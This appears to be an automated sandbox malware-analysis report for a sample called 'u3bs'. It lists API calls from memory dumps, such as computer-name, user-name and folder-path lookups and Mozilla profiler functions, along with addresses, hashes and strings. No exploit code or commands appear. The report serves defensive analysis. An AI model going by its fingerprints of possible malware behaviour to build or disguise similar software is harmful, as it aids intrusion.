                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                                        • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                        • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                        • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                        • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: 4998d78665a182cfe3f098699877b2c6e461f8b8b8b3f763f93a82d2c629cf92
                                                                                                                                                        • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                                                                        • Opcode Fuzzy Hash: 4998d78665a182cfe3f098699877b2c6e461f8b8b8b3f763f93a82d2c629cf92
                                                                                                                                                        • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1699248803-0
                                                                                                                                                        • Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                        • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                                                                        • Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                        • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,043306D0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1004333139-0
                                                                                                                                                        • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                        • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                        • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                        • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                        • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                        • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                                                                        • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                        • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0BF09B
                                                                                                                                                          • Part of subcall function 6B095B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6B0956EE,?,00000001), ref: 6B095B85
                                                                                                                                                          • Part of subcall function 6B095B50: EnterCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095B90
                                                                                                                                                          • Part of subcall function 6B095B50: LeaveCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095BD8
                                                                                                                                                          • Part of subcall function 6B095B50: GetTickCount64.KERNEL32 ref: 6B095BE4
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6B0BF0AC
                                                                                                                                                          • Part of subcall function 6B095C50: GetTickCount64.KERNEL32 ref: 6B095D40
                                                                                                                                                          • Part of subcall function 6B095C50: EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B095D67
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6B0BF0BE
                                                                                                                                                          • Part of subcall function 6B095C50: __aulldiv.LIBCMT ref: 6B095DB4
                                                                                                                                                          • Part of subcall function 6B095C50: LeaveCriticalSection.KERNEL32(6B0FF688), ref: 6B095DED
                                                                                                                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0BF155
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BF1E0
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF1ED
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF212
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BF229
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BF231
                                                                                                                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0BF248
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BF2AE
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF2BB
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF2F8
                                                                                                                                                          • Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
                                                                                                                                                          • Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
                                                                                                                                                          • Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BF350
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF35D
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF381
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BF398
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BF3A0
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BF489
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BF491
                                                                                                                                                          • Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
                                                                                                                                                          • Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508
                                                                                                                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0BF3CF
                                                                                                                                                          • Part of subcall function 6B0BF070: GetCurrentThreadId.KERNEL32 ref: 6B0BF440
                                                                                                                                                          • Part of subcall function 6B0BF070: AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF44D
                                                                                                                                                          • Part of subcall function 6B0BF070: ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF472
                                                                                                                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0BF4A8
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BF559
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BF561
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BF577
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF585
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BF5A3
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_resume_sampling, xrefs: 6B0BF499
                                                                                                                                                        • [I %d/%d] profiler_pause_sampling, xrefs: 6B0BF3A8
                                                                                                                                                        • [I %d/%d] profiler_resume, xrefs: 6B0BF239
                                                                                                                                                        • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6B0BF56A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                                                                                        • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                        • API String ID: 565197838-2840072211
                                                                                                                                                        • Opcode ID: 0eb5924a563fe4e83cd11689b9bddec906cb3ea81c95695dba8bfa5a46213eed
                                                                                                                                                        • Instruction ID: 52d4e661df5a5433e5da5eddafc78fb854c209eb2beae7befc16050a09433877
                                                                                                                                                        • Opcode Fuzzy Hash: 0eb5924a563fe4e83cd11689b9bddec906cb3ea81c95695dba8bfa5a46213eed
                                                                                                                                                        • Instruction Fuzzy Hash: 28D11735B042049FDB089F78E48575A7FEDEB86368F00052AED5983381DB79E805CBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,6B0BE2A6), ref: 6B0BE35E
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6B0BE2A6), ref: 6B0BE386
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BE3E4
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE3F1
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6B0BE4AB
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE4F5
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BE577
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE584
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BE5DE
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6B0BE8A6
                                                                                                                                                          • Part of subcall function 6B07B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6B07B7CF
                                                                                                                                                          • Part of subcall function 6B07B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6B07B808
                                                                                                                                                          • Part of subcall function 6B0CB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6B0F0FB6,00000000,?,?,6B0BE69E), ref: 6B0CB830
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000000), ref: 6B0BE6DA
                                                                                                                                                          • Part of subcall function 6B0CB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6B0CB916
                                                                                                                                                          • Part of subcall function 6B0CB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6B0CB94A
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6B0BE864
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BE883
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
                                                                                                                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                        • API String ID: 2698983630-53385798
                                                                                                                                                        • Opcode ID: 40d78cf811aaeca63d682548aed731cb4911d7065199bfe36e167fa4de1180df
                                                                                                                                                        • Instruction ID: 452478d632dd871955a378a34693a410a55782555411e4537135fc831fb750e2
                                                                                                                                                        • Opcode Fuzzy Hash: 40d78cf811aaeca63d682548aed731cb4911d7065199bfe36e167fa4de1180df
                                                                                                                                                        • Instruction Fuzzy Hash: B3027A75A003059FCB18CF28D484B6ABFE9FF89304F0449ADE95A97341DB39E945CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE744), ref: 6B087885
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE744), ref: 6B0878A5
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE784), ref: 6B0878AD
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B0878CD
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0878D4
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6B0878E9
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6B08795D
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000160), ref: 6B0879BB
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6B087BBC
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000158), ref: 6B087C82
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE7DC), ref: 6B087CD2
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6B087DAF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 759993129-0
                                                                                                                                                        • Opcode ID: bcf1e6e029c0edc72ea1572fb1ab792c5316ec901769eecc9f550fe34815a645
                                                                                                                                                        • Instruction ID: 81fa2cd4d0ef5768a51f091b02c198e667ffa1f8c13cf6378ad67ad502b78b47
                                                                                                                                                        • Opcode Fuzzy Hash: bcf1e6e029c0edc72ea1572fb1ab792c5316ec901769eecc9f550fe34815a645
                                                                                                                                                        • Instruction Fuzzy Hash: E7025D71A0421A8FDF58CF18C984799BBB6FF88314F5582EAD809A7315D734AE91CF80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0B51DF
                                                                                                                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0B529C
                                                                                                                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6B0B52FF
                                                                                                                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0B536D
                                                                                                                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6B0B53F7
                                                                                                                                                          • Part of subcall function 6B0AAB89: EnterCriticalSection.KERNEL32(6B0FE370,?,?,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284), ref: 6B0AAB94
                                                                                                                                                          • Part of subcall function 6B0AAB89: LeaveCriticalSection.KERNEL32(6B0FE370,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284,?,?,6B0956F6), ref: 6B0AABD1
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6B0B56C3
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6B0B56E0
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6B0B56BE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                                                                                                        • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                                                                                                        • API String ID: 1227157289-345010206
                                                                                                                                                        • Opcode ID: 42ca59dda2151b6df05d4155409ed93129a2bfbfc0d5a7544c986c3fe2f3efb7
                                                                                                                                                        • Instruction ID: ea22b4aedcde03980a4803d7641129f798bc7198f86e1f1d2f0b88aecadbf802
                                                                                                                                                        • Opcode Fuzzy Hash: 42ca59dda2151b6df05d4155409ed93129a2bfbfc0d5a7544c986c3fe2f3efb7
                                                                                                                                                        • Instruction Fuzzy Hash: 68E19F75914F458AC716CF34C86022BBBFABF9B780F109B4EE8AF2A551DB35E0468701
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32 ref: 6B0D7046
                                                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6B0D7060
                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6B0D707E
                                                                                                                                                          • Part of subcall function 6B0881B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6B0881DE
                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6B0D7096
                                                                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6B0D709C
                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 6B0D70AA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                        • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                        • API String ID: 2989430195-1695379354
                                                                                                                                                        • Opcode ID: cd5fc0283004880afd4f4fdf622289b952dde812de9a1ba0013b4c9fe22c20ce
                                                                                                                                                        • Instruction ID: c6d55e4ce2226cfd0d1f854e09918b6e9bb46926af35b2f174671928708feed6
                                                                                                                                                        • Opcode Fuzzy Hash: cd5fc0283004880afd4f4fdf622289b952dde812de9a1ba0013b4c9fe22c20ce
                                                                                                                                                        • Instruction Fuzzy Hash: B50156B2A00108ABDF046BA4EC4AEAF7FACEF49255F050425FE06A7141E675E9148BA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B089B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6B0DB92D), ref: 6B089BC8
